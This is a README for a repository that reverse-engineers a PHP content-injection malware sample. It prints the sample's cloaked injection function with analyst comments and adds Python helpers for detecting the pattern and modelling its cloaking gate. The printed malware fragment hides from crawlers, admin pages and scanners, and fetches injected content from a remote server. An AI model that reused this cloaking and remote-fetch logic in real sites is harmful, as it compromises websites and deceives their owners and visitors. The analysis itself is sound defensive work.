# Reverse Engineering PHP Malware Content injection

This repository is the result of reverse engineering a PHP malware sample that performs content injection.

The full description can be found in English at (@todo add link here) and in Portuguese at (@todo add link here).

Authors of this work (the reverse engineering, not the malware):

- Bernardo Donadio bcdonadio at
- Emerson Rocha Luiz emerson at

## Sample code

```php
<?php
/** REVENGNOTE: Do not assume that this malware will have the same function names,
 *              even for the same malware.
 */
// check212(), k34(), cqq(), en2() and gtd() are further functions of the same
// sample and are not reproduced in this fragment.
function day212()
{
	$a = check212("HTTP_USER_AGENT");
	$b = check212("HTTP_REFERER");
	$c = check212("REMOTE_ADDR");
	$d = check212("HTTP_HOST");
	$e = check212("PHP_SELF");

	/** REVENGNOTE: this next array does nothing here, but it was in the original code.
	 *              Its entries (omitted from this sample) are domains that point (now)
	 *              to the same working server; they are used to create the content
	 *              that is injected into the user's code.
	 */
	$domarr = array(
		/* domain list omitted from the published sample */
	);

	/** REVENGNOTE: this is very important. It does NOT inject content into the site
	 *              if the visitor is a search engine (which could alert the site admin
	 *              to this malware), and it also does not load on pages that look like
	 *              administrator interfaces. It also checks for a valid HTTP_REFERER,
	 *              so sharing a link with a friend sometimes will not work at all,
	 *              because you need to navigate the site first. It is very likely that
	 *              most common antivirus agents will pass this basic check, but the
	 *              remote server will recognise their user agent and return empty content.
	 */
	if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin") or (preg_match("/" . implode("|", array(
		/* search-engine user-agent list omitted from the published sample */
	)) . "/i", strtolower($a)))) {
		$o1 = "";
	} else {
		$op = mt_rand(100000, 999999);
		$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
		$url = "http://" . cqq(".com") . "/" . $g4;
		$ca1 = en2(@gtd($url), $op);
		$a1 = @explode("!NF0", $ca1);
		if (sizeof($a1) >= 2) $o1 = $a1[1];
		else $o1 = "";
	}

	return $o1;
}
```
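The two things a defender usually wants from a fragment like `day212()` are a way to find the same pattern in other files and a way to understand why the injected content never shows up when the site owner looks. The following is an added example, not code from this repository or from the malware: `scan_php_source()` flags PHP source carrying the indicators visible in the sample (the `!NF0` delimiter, the `admin`-in-`PHP_SELF` check, the double `urlencode()` of an `mt_rand()`-keyed payload, and a remote URL built from a concatenated `.com`), and `would_inject()` mirrors only the local gate of `day212()` so an incident responder can see which request properties the sample requires before it contacts the remote server. It assumes that `check212()` returns the literal `"non"` for a missing server variable (inferred from the comparisons in the sample), and the crawler user-agent list is a constructed placeholder because the sample elides it.

```python
"""Defender-side helpers for the cloaked content-injection pattern in day212().

Added example, not part of the original repository. Function names such as
check212/k34/cqq/en2/gtd are referenced only in comments; nothing here fetches
anything remotely.
"""
import re

# Indicators lifted from the published fragment; each is a (name, regex) pair.
INDICATORS = [
    ("nf0_delimiter", re.compile(r'explode\(\s*["\']!NF0["\']')),
    ("admin_path_cloak", re.compile(r'strrpos\(\s*strtolower\(\s*\$\w+\s*\)\s*,\s*["\']admin["\']')),
    ("double_urlencode", re.compile(r'urlencode\(\s*urlencode\(')),
    ("mt_rand_key", re.compile(r'mt_rand\(\s*100000\s*,\s*999999\s*\)')),
    ("concat_tld_url", re.compile(r'"http://"\s*\.\s*\w+\(\s*["\']\.com["\']\s*\)')),
]


def scan_php_source(source: str) -> list:
    """Return the names of the indicators found in a PHP source string."""
    return [name for name, rx in INDICATORS if rx.search(source)]


# Constructed placeholder: the sample's real crawler list is not published.
CRAWLER_UA_TOKENS = ["googlebot", "bingbot", "yandex", "slurp"]


def would_inject(user_agent, remote_addr, http_host, php_self):
    """Mirror of the sample's local gate: True when day212() would reach the fetch.

    Assumption: check212() yields the literal "non" for a missing variable, so a
    missing User-Agent, REMOTE_ADDR or HTTP_HOST disables injection, as does an
    "admin" substring in PHP_SELF or a crawler token in the User-Agent. The referer
    ($b) enters only the request key in the published fragment, so it is not part of
    this mirror. PHP's strrpos() returns 0 (falsy) when "admin" sits at offset 0, so
    the comparison below keeps that quirk instead of using a plain substring test.
    """
    a, c, d, e = (v if v else "non" for v in (user_agent, remote_addr, http_host, php_self))
    if "non" in (a, c, d):
        return False
    if e.lower().rfind("admin") > 0:   # strrpos(): false and 0 are both falsy in PHP
        return False
    if re.search("|".join(CRAWLER_UA_TOKENS), a.lower()):
        return False
    return True


# Constructed PHP fragment imitating the published gate, used as scanner input.
SAMPLE_PHP = r'''
if (($a == "non") or strrpos(strtolower($e) , "admin")) { $o1 = ""; } else {
  $op = mt_rand(100000, 999999);
  $g4 = $op . "?" . urlencode(urlencode(k34($op, $a)));
  $url = "http://" . cqq(".com") . "/" . $g4;
  $a1 = @explode("!NF0", $ca1);
}
'''

if __name__ == "__main__":
    print("indicators:", scan_php_source(SAMPLE_PHP))
    for ua, path in [("Mozilla/5.0", "/index.php"), ("Mozilla/5.0", "/wp-admin/index.php"), ("Googlebot/2.1", "/index.php")]:
        print(ua, path, "->", "injects" if would_inject(ua, "203.0.113.5", "example.com", path) else "cloaked")
```

`would_inject()` explains the usual triage dead end: an administrator browsing `/wp-admin/`, a crawler, or a scanner without a User-Agent all receive clean pages, so a reproduction attempt has to look like an ordinary browser visiting a public path. The regexes in `INDICATORS` are deliberately narrow to the identifiers seen in this sample; as the first REVENGNOTE warns, function names change between samples, so treat a hit as a reason to read the file, not as a verdict on its own.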


This is a reverse engineering of malicious code found on compromised servers. The use of this code without the explicit consent of the owner of the infrastructure constitutes a felony in many countries. Do not use it except for educational purposes.

